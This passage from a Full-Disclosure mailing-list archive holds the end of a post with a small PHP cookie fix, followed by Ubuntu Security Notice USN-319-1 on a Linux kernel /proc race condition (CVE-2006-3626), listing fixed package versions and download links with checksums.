In the delcoookie.php replace "setcookie('gbook',
$_COOKIE['gbook'], time()-2419200);" with
"setcookie('gbook', '', time()-2419200);".
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-319-1] Linux kernel vulnerability
=== Ubuntu Security Notice USN-319-1 July 18, 2006 linux-source-2.6.15 vulnerability CVE-2006-3626 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: linux-image-2.6.15-26-3862.6.15-26.45 linux-image-2.6.15-26-6862.6.15-26.45 linux-image-2.6.15-26-amd64-generic 2.6.15-26.45 linux-image-2.6.15-26-amd64-k8 2.6.15-26.45 linux-image-2.6.15-26-amd64-server 2.6.15-26.45 linux-image-2.6.15-26-amd64-xeon 2.6.15-26.45 linux-image-2.6.15-26-hppa32 2.6.15-26.45 linux-image-2.6.15-26-hppa32-smp 2.6.15-26.45 linux-image-2.6.15-26-hppa64 2.6.15-26.45 linux-image-2.6.15-26-hppa64-smp 2.6.15-26.45 linux-image-2.6.15-26-itanium2.6.15-26.45 linux-image-2.6.15-26-itanium-smp2.6.15-26.45 linux-image-2.6.15-26-k7 2.6.15-26.45 linux-image-2.6.15-26-mckinley 2.6.15-26.45 linux-image-2.6.15-26-mckinley-smp 2.6.15-26.45 linux-image-2.6.15-26-powerpc2.6.15-26.45 linux-image-2.6.15-26-powerpc-smp2.6.15-26.45 linux-image-2.6.15-26-powerpc64-smp 2.6.15-26.45 linux-image-2.6.15-26-server 2.6.15-26.45 linux-image-2.6.15-26-server-bigiron 2.6.15-26.45 linux-image-2.6.15-26-sparc642.6.15-26.45 linux-image-2.6.15-26-sparc64-smp2.6.15-26.45 After a standard system upgrade you need to reboot your computer to effect the necessary changes. This flaw affects Ubuntu 5.04 and Ubuntu 5.10 as well; these releases will be fixed shortly in a followup advisory. Details follow: A race condition has been discovered in the file permission handling of the /proc file system. A local attacker could exploit this to execute arbitrary code with full root privileges. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-26.45.diff.gz Size/MD5: 2124749 3de4c3eddba7030297c1014fcb2c5950 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-26.45.dsc Size/MD5: 2379 cf43e7a36b7481b1addc62d89a21668b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-26.45_all.deb Size/MD5: 5157202 633e4b5601b77a1aa53330a117bd3655 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-26.45_all.deb Size/MD5:87296 bef5a59910598b0521d3fbd0ad25dfa8 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-26.45_all.deb Size/MD5: 44452898 0ef865e266a69bc1136889f2d758ba99 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-26-amd64-generic-di_2.6.15-26.45_amd64.udeb Size/MD5:22140 145c0e2b255420a9e1b6ee99bfaa3811 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-26-amd64-generic-di_2.6.15-26.45_amd64.udeb Size/MD5:44776 2b0deb1c70fe6345839d5851f93e1438 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-26-amd64-generic-di_2.6.15-26.45_amd64.udeb Size/MD5: 2308 79341b75318cd8a7a6db9d9429c5d6be http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-26-amd64-generic-di_2.6.15-26.45_amd64.udeb Size/MD5:36196 c23d39cbca37f01efa4147bc99e8ac62 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-26-amd64-generic-di_2.6.15-26.45_amd64.udeb Size/MD5: 102026 6649421f576f4971cd17bb9a7c85713d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-26-amd64-generic-di_2.6.15-26.45_amd64.udeb Size/MD5:38606 eb48b38edfc572bb840d4c9668073578 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-26-amd64-generic-di_2.6.15-26.45_amd64.udeb Size/MD5:49126 4a4697baddf124ff7d254d2ff5c269e2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-26-amd64-generic-di_2.6.15-26.45_amd64.udeb Size/MD5: 176756 e25baa577d3e8e29efba16133d958306 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-26-amd64-generic-di_2.6.15-26.45_
